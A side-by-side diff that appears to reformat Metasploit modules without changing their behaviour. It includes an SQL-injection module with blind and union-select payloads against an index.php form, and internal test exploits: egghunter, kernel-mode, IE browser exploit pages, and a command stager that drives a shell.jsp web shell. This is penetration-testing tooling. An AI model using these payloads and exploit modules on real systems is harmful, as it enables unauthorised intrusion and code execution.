@ -41,18 +39,18 @@ class MetasploitModule < Msf::Auxiliary
def boolean_blind def boolean_blind
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: { sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: {
encoder: encoder, encoder: encoder,
hex_encode_strings: datastore['HexEncodeStrings'], hex_encode_strings: datastore['HexEncodeStrings'],
safe: datastore['Safe'] safe: datastore['Safe']
}) do |payload| }) do |payload|
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST', 'method' => 'POST',
'vars_post' => { 'vars_post' => {
'tag' => "' or #{payload}--", 'tag' => "' or #{payload}--",
'search' => 'Check Plan' 'search' => 'Check Plan'
} }
}) })
res.body.include?('Dear') res.body.include?('Dear')
end end
unless sqli.test_vulnerable unless sqli.test_vulnerable
@ -66,18 +64,18 @@ class MetasploitModule < Msf::Auxiliary
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength'] truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
sqli = create_sqli(dbms: SQLitei::Common, opts: { sqli = create_sqli(dbms: SQLitei::Common, opts: {
encoder: encoder, encoder: encoder,
hex_encode_strings: datastore['HexEncodeStrings'], hex_encode_strings: datastore['HexEncodeStrings'],
truncation_length: truncation, truncation_length: truncation,
safe: datastore['Safe'] safe: datastore['Safe']
}) do |payload| }) do |payload|
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET', 'method' => 'GET',
'vars_get' => { 'vars_get' => {
'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--" 'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--"
} }
}) })
if !res if !res
'' ''
else else
@ -100,18 +98,18 @@ class MetasploitModule < Msf::Auxiliary
def time_blind def time_blind
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: { sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: {
encoder: encoder, encoder: encoder,
hex_encode_strings: datastore['HexEncodeStrings'], hex_encode_strings: datastore['HexEncodeStrings'],
safe: datastore['Safe'] safe: datastore['Safe']
}) do |payload| }) do |payload|
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST', 'method' => 'POST',
'vars_post' => { 'vars_post' => {
'tag' => "' or #{payload}--", 'tag' => "' or #{payload}--",
'search' => 'Check Plan' 'search' => 'Check Plan'
} }
}) })
raise ArgumentError unless res raise ArgumentError unless res
end end
unless sqli.test_vulnerable unless sqli.test_vulnerable
@ -141,9 +139,9 @@ class MetasploitModule < Msf::Auxiliary
def check def check
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET' 'method' => 'GET'
}) })
if res&.body&.include?('--==[[IndiShell Lab]]==--') if res&.body&.include?('--==[[IndiShell Lab]]==--')
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
else else

49
test/modules/exploits/test/aggressive.rb
View File

@ -3,29 +3,27 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Internal Aggressive Test Exploit', update_info(
'Description' => info,
"This module tests the exploitation of a test service.", 'Name' => 'Internal Aggressive Test Exploit',
'Author' => 'skape', 'Description' => "This module tests the exploitation of a test service.",
'License' => MSF_LICENSE, 'Author' => 'skape',
'Arch' => 'x86', 'License' => MSF_LICENSE,
'Payload' => 'Arch' => 'x86',
{ 'Payload' => {
'Space' => 1000, 'Space' => 1000,
'MaxNops' => 0, 'MaxNops' => 0,
'BadChars' => "\x00", 'BadChars' => "\x00",
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
}, },
'Targets' => 'Targets' => [
[
# Target 0: Universal # Target 0: Universal
[ [
'Any Platform', 'Any Platform',
@ -37,13 +35,13 @@ class MetasploitModule < Msf::Exploit::Remote
'Test encoder specific', 'Test encoder specific',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Payload' => 'Payload' =>
{ {
'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' => 'EncoderOptions' =>
{ {
'BufferRegister' => 'EBX', 'BufferRegister' => 'EBX',
'BufferOffset' => 4 'BufferOffset' => 4
} }
} }
}, },
@ -52,32 +50,35 @@ class MetasploitModule < Msf::Exploit::Remote
'Cannot be encoded', 'Cannot be encoded',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Payload' => 'Payload' =>
{ {
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s 'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
} }
} }
], ],
[ 'Test context encoder', [
'Test context encoder',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00" 'BadChars' => "\x00"
} }
} }
] ]
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
register_options( register_options(
[ [
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]), OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ]) OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
]) ]
)
end end
def autofilter def autofilter
false false
end end
@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
# Show disassembled payload for context encoder test # Show disassembled payload for context encoder test
if target.name =~ /context encoder/ if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40]) puts Rex::Assembly::Nasm.disassemble(payload.encoded[0, 40])
end end
connect connect

77
test/modules/exploits/test/browserexploitserver.rb
View File

@ -3,78 +3,77 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept", update_info(
'Description' => %q{ info,
Here's an example of building an exploit using the BrowserExploitServer. 'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
This example requires the target to be exploit. If not, the mixin will 'Description' => %q{
send a fake 404 as a way to avoid engaging the target. The example is Here's an example of building an exploit using the BrowserExploitServer.
for Windows only. This example requires the target to be exploit. If not, the mixin will
}, send a fake 404 as a way to avoid engaging the target. The example is
'License' => MSF_LICENSE, for Windows only.
'Author' => [ 'sinn3r' ], },
'References' => 'License' => MSF_LICENSE,
[ 'Author' => [ 'sinn3r' ],
'References' => [
[ 'URL', 'https://metasploit.com' ] [ 'URL', 'https://metasploit.com' ]
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' => {
{
:source => /script|headers/i, :source => /script|headers/i,
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1 # :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
#:method => "LoadMovie", # :method => "LoadMovie",
:os_name => /win/i :os_name => /win/i
}, },
'Targets' => 'Targets' => [
[
[ 'Automatic', {} ], [ 'Automatic', {} ],
[ [
'Windows XP with IE 8', 'Windows XP with IE 8',
{ {
'os_flavor' => 'XP', 'os_flavor' => 'XP',
'ua_name' => 'MSIE', 'ua_name' => 'MSIE',
'ua_ver' => '8.0', 'ua_ver' => '8.0',
'Rop' => true, 'Rop' => true,
'Offset' => 0x100 'Offset' => 0x100
} }
], ],
[ [
'Windows 7 with IE 9', 'Windows 7 with IE 9',
{ {
'os_flavor' => '7', 'os_flavor' => '7',
'ua_name' => 'MSIE', 'ua_name' => 'MSIE',
'ua_ver' => '9.0', 'ua_ver' => '9.0',
'Rop' => true, 'Rop' => true,
'Offset' => 0x100 'Offset' => 0x100
} }
], ],
[ [
'Windows 7 with IE 10', 'Windows 7 with IE 10',
{ {
'os_flavor' => '7', 'os_flavor' => '7',
'ua_name' => 'MSIE', 'ua_name' => 'MSIE',
'ua_ver' => '10.0', 'ua_ver' => '10.0',
'Rop' => true, 'Rop' => true,
'Offset' => 0x100 'Offset' => 0x100
} }
] ]
], ],
'Payload' => 'Payload' => {
{ 'BadChars' => "\x00", # Our spray doesn't like null bytes
'BadChars' => "\x00", #Our spray doesn't like null bytes
'StackAdjustment' => -3500 'StackAdjustment' => -3500
}, },
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => '2013-04-01', 'DisclosureDate' => '2013-04-01',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
# #

27
test/modules/exploits/test/check.rb
View File

@ -3,31 +3,32 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit class MetasploitModule < Msf::Exploit
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Check Test Exploit", update_info(
'Description' => %q{ info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules. This module ensures that 'check' actually functions for Exploit modules.
}, },
'References' => 'References' => [
[
[ 'OSVDB', '0' ] [ 'OSVDB', '0' ]
], ],
'Author' => 'Author' => [
[
'todb' 'todb'
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DisclosureDate' => '2013-05-23' 'DisclosureDate' => '2013-05-23'
)) )
)
register_options( register_options(
[ [
Opt::RPORT(80) Opt::RPORT(80)
], self.class) ], self.class
)
end end
def check def check

46
test/modules/exploits/test/cmdweb.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred # =( need more targets and perhaps more OS specific return values OS specific would be preferred
@ -12,47 +11,48 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Command Stager Web Test', update_info(
'Description' => %q{ info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server. on an Apache Tomcat server.
}, },
'Author' => 'bannedit', 'Author' => 'bannedit',
'References' => 'References' => [
[
], ],
'DefaultOptions' => 'DefaultOptions' => {
{
}, },
'Payload' => 'Payload' => {
{
}, },
'Platform' => 'win', 'Platform' => 'win',
'Privileged' => true, 'Privileged' => true,
'Targets' => 'Targets' => [
[
# need more but this will likely cover most cases # need more but this will likely cover most cases
[ 'Automatic Targeting', [
'Automatic Targeting',
{ {
'auto' => true 'auto' => true
} }
], ],
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => '2010-02-03')) 'DisclosureDate' => '2010-02-03'
)
)
register_options( register_options(
[ [
Opt::RPORT(8080), Opt::RPORT(8080),
], self.class) ], self.class
)
end end
def autofilter def autofilter
false false
end end
# This is method required for the CmdStager to work... # This is method required for the CmdStager to work...
def execute_command(cmd, opts) def execute_command(cmd, opts)
uri = opts[:uri] uri = opts[:uri]
@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
opts = { opts = {
:delay => 0.5, :delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS" :uri => "/shell/shell.jsp?cmd=CMDS"
@ -72,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
execute_cmdstager(opts) execute_cmdstager(opts)
handler handler
end end
end end

38
test/modules/exploits/test/dialup.rb
View File

@ -3,37 +3,37 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Dialup include Msf::Exploit::Remote::Dialup
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Test Dialup Exploit', update_info(
'Description' => %q{ info,
This exploit connects to a system's modem over dialup and provides 'Name' => 'Test Dialup Exploit',
the user with a readout of the login banner. 'Description' => %q{
}, This exploit connects to a system's modem over dialup and provides
'Author' => the user with a readout of the login banner.
[ },
'Author' => [
'I)ruid', 'I)ruid',
], ],
'Arch' => ARCH_TTY, 'Arch' => ARCH_TTY,
'Platform' => ['unix'], 'Platform' => ['unix'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Payload' => 'Payload' => {
{ 'Space' => 1000,
'Space' => 1000,
'BadChars' => '', 'BadChars' => '',
'DisableNops' => true, 'DisableNops' => true,
}, },
'Targets' => 'Targets' => [
[ [ 'Automatic', {} ],
[ 'Automatic', { } ],
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def autofilter def autofilter

47
test/modules/exploits/test/egghunter.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
@ -11,43 +10,46 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Egghunter include Msf::Exploit::Egghunter
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Internal Egghunter Test Exploit', update_info(
'Description' => info,
"This module tests the exploitation of a test service using the Egghunter.", 'Name' => 'Internal Egghunter Test Exploit',
'Author' => 'jduck', 'Description' => "This module tests the exploitation of a test service using the Egghunter.",
'License' => MSF_LICENSE, 'Author' => 'jduck',
'Arch' => ARCH_X86, 'License' => MSF_LICENSE,
'Payload' => 'Arch' => ARCH_X86,
{ 'Payload' => {
'Space' => 1000, 'Space' => 1000,
'MaxNops' => 0, 'MaxNops' => 0,
'BadChars' => "\x00", 'BadChars' => "\x00",
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
}, },
'Targets' => 'Targets' => [
[ [
[ 'Windows', 'Windows',
{ {
'Platform' => 'win' 'Platform' => 'win'
} }
], ],
[ 'Linux', [
'Linux',
{ {
'Platform' => 'linux' 'Platform' => 'linux'
} }
] ]
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
register_options( register_options(
[ [
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]) OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
]) ]
)
end end
def autofilter def autofilter
false false
end end
@ -57,20 +59,19 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
connect connect
print_status("Sending #{payload.encoded.length} byte payload...") print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true :checksum => true
}) })
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes") print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = '' sploit = ''
# break before? # break before?
#sploit << "\xcc" # sploit << "\xcc"
sploit << eh_stub sploit << eh_stub
# just return otherwise # just return otherwise
sploit << "\xc3" sploit << "\xc3"

44
test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
View File

@ -3,47 +3,45 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE include Msf::Exploit::EXE
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Explib2 Drop Exec Test Case", update_info(
'Description' => %q{ info,
This module allows to test integration of Explib2 into metasploit. 'Name' => "Explib2 Drop Exec Test Case",
}, 'Description' => %q{
'License' => MSF_LICENSE, This module allows to test integration of Explib2 into metasploit.
'Author' => },
[ 'License' => MSF_LICENSE,
'Author' => [
'guhe120', # Original explib2 author 'guhe120', # Original explib2 author
'juan vazquez' 'juan vazquez'
], ],
'References' => 'References' => [
[
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' => {
{ :source => /script/i,
:source => /script/i,
:os_name => OperatingSystems::WINDOWS, :os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
:ua_ver => '11.0' :ua_ver => '11.0'
}, },
'Targets' => 'Targets' => [
[ [ 'Automatic', {} ]
[ 'Automatic', { } ]
], ],
'DisclosureDate' => '2014-03-28', 'DisclosureDate' => '2014-03-28',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def exploit_html def exploit_html
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u") exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
template = %Q|<html> template = %Q|<html>

43
test/modules/exploits/test/explib2_ie11_exec_test_case.rb
View File

@ -3,42 +3,41 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Explib2 Exec Test Case", update_info(
'Description' => %q{ info,
This module allows to test integration of Explib2 into metasploit. 'Name' => "Explib2 Exec Test Case",
}, 'Description' => %q{
'License' => MSF_LICENSE, This module allows to test integration of Explib2 into metasploit.
'Author' => },
[ 'License' => MSF_LICENSE,
'Author' => [
'guhe120', # Original explib2 author 'guhe120', # Original explib2 author
'juan vazquez' 'juan vazquez'
], ],
'References' => 'References' => [
[
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' => {
{ :source => /script/i,
:source => /script/i,
:os_name => OperatingSystems::WINDOWS, :os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
:ua_ver => '11.0' :ua_ver => '11.0'
}, },
'Targets' => 'Targets' => [
[ [ 'Automatic', {} ]
[ 'Automatic', { } ]
], ],
'DisclosureDate' => '2014-03-28', 'DisclosureDate' => '2014-03-28',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def exploit_html def exploit_html

68
test/modules/exploits/test/exploitme.rb
View File

@ -3,51 +3,50 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'MIPS Aggressive Test Exploit', update_info(
'Description' => 'This module tests the exploitation of a test service', info,
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'], 'Name' => 'MIPS Aggressive Test Exploit',
'License' => MSF_LICENSE, 'Description' => 'This module tests the exploitation of a test service',
#'Arch' => ARCH_MIPSBE, 'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'Payload' => 'License' => MSF_LICENSE,
{ # 'Arch' => ARCH_MIPSBE,
'MaxNops' => 0, 'Payload' => {
#'BadChars' => "\x00", 'MaxNops' => 0,
#'StackAdjustment' => -3500, # 'BadChars' => "\x00",
# 'StackAdjustment' => -3500,
}, },
'Targets' => 'Targets' => [
[
# Target 0: Universal # Target 0: Universal
[ [
'Mips big endian', 'Mips big endian',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE 'Arch' => ARCH_MIPSBE
} }
], ],
[ [
'Mips big endian cannot be encoded', 'Mips big endian cannot be encoded',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE, 'Arch' => ARCH_MIPSBE,
'Payload' => 'Payload' =>
{ {
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s 'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
} }
} }
], [ ], [
'Mips big endian encoder needed', 'Mips big endian encoder needed',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE, 'Arch' => ARCH_MIPSBE,
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00" 'BadChars' => "\x00"
} }
@ -57,43 +56,44 @@ class MetasploitModule < Msf::Exploit::Remote
'Mips little endian', 'Mips little endian',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE 'Arch' => ARCH_MIPSLE
} }
], ],
[ [
'Mips little endian cannot be encoded', 'Mips little endian cannot be encoded',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE, 'Arch' => ARCH_MIPSLE,
'Payload' => 'Payload' =>
{ {
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s 'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
} }
} }
], [ ], [
'Mips little endian encoder needed', 'Mips little endian encoder needed',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE, 'Arch' => ARCH_MIPSLE,
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00" 'BadChars' => "\x00"
} }
} }
], ],
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
register_options( register_options(
[ [
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]), OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ]) OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
]) ]
)
end end
def autofilter def autofilter
false false
end end
@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
# Show disassembled payload for context encoder test # Show disassembled payload for context encoder test
if target.name =~ /context encoder/ if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40]) # puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!) # FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end end
connect connect

52
test/modules/exploits/test/java_tester.rb
View File

@ -8,30 +8,35 @@ require 'rex'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
def initialize( info = {} ) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Exec', update_info(
'Description' => %q{ }, info,
'License' => MSF_LICENSE, 'Name' => 'Exec',
'Author' => [ 'egypt' ], 'Description' => %q{ },
'References' => [ ], 'License' => MSF_LICENSE,
'Platform' => [ 'java', 'linux' ], 'Author' => [ 'egypt' ],
'Arch' => ARCH_JAVA, 'References' => [ ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Platform' => [ 'java', 'linux' ],
'Targets' => 'Arch' => ARCH_JAVA,
[ 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
[ 'Generic (Java Payload)', { 'Targets' => [
'Arch' => ARCH_JAVA, [
'Platform' => 'java' 'Generic (Java Payload)', {
} ], 'Arch' => ARCH_JAVA,
[ 'Linux', { 'Platform' => 'java'
'Arch' => ARCH_X86, }
'Platform' => 'linux' ],
} ], [
'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) )
)
end end
def exploit def exploit
@ -47,4 +52,3 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end

43
test/modules/exploits/test/js_tester.rb
View File

@ -1,28 +1,30 @@
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "IE Test for Javascript Libs", update_info(
'Description' => %q{ info,
Tests Javascript hotness 'Name' => "IE Test for Javascript Libs",
}, 'Description' => %q{
'License' => MSF_LICENSE, Tests Javascript hotness
'Author' => [ 'sinn3r' ], },
'References' => [ [ 'URL', 'https://metasploit.com' ] ], 'License' => MSF_LICENSE,
'Platform' => 'win', 'Author' => [ 'sinn3r' ],
'Targets' => [ [ 'Automatic', {} ] ], 'References' => [ [ 'URL', 'https://metasploit.com' ] ],
'Payload' => 'Platform' => 'win',
{ 'Targets' => [ [ 'Automatic', {} ] ],
'BadChars' => "\x00", 'Payload' => {
'BadChars' => "\x00",
'StackAdjustment' => -3500 'StackAdjustment' => -3500
}, },
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => '2013-04-01', 'DisclosureDate' => '2013-04-01',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def test_base64 def test_base64
@ -72,12 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
| |
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
# Change the following to a specific function # Change the following to a specific function
js = test_base64 js = test_base64
html = %Q| html = %Q|
<!doctype html> <!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
@ -95,8 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
</html> </html>
| |
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })
end end
end end

42
test/modules/exploits/test/kernel.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
# #
# This is a test exploit for testing kernel-mode payloads. # This is a test exploit for testing kernel-mode payloads.
# #
@ -14,39 +13,40 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::KernelMode include Msf::Exploit::KernelMode
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Internal Kernel-mode Test Exploit', update_info(
'Description' => info,
"This module tests the exploitation of a kernel-mode test service.", 'Name' => 'Internal Kernel-mode Test Exploit',
'Author' => 'skape', 'Description' => "This module tests the exploitation of a kernel-mode test service.",
'License' => MSF_LICENSE, 'Author' => 'skape',
'Arch' => 'x86', 'License' => MSF_LICENSE,
'Payload' => 'Arch' => 'x86',
{ 'Payload' => {
'Space' => 1000, 'Space' => 1000,
'MaxNops' => 0, 'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500 'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
}, },
'Targets' => 'Targets' => [
[
[ [
'Windows XP SP2', 'Windows XP SP2',
{ {
'Ret' => 0x80502d7f, # jmp esp 'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win', 'Platform' => 'win',
'Payload' => 'Payload' =>
{ {
'ExtendedOptions' => 'ExtendedOptions' =>
{ {
'Stager' => 'sud_syscall_hook', 'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin' 'Recovery' => 'spin'
} }
} }
} }
], ],
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def autofilter def autofilter
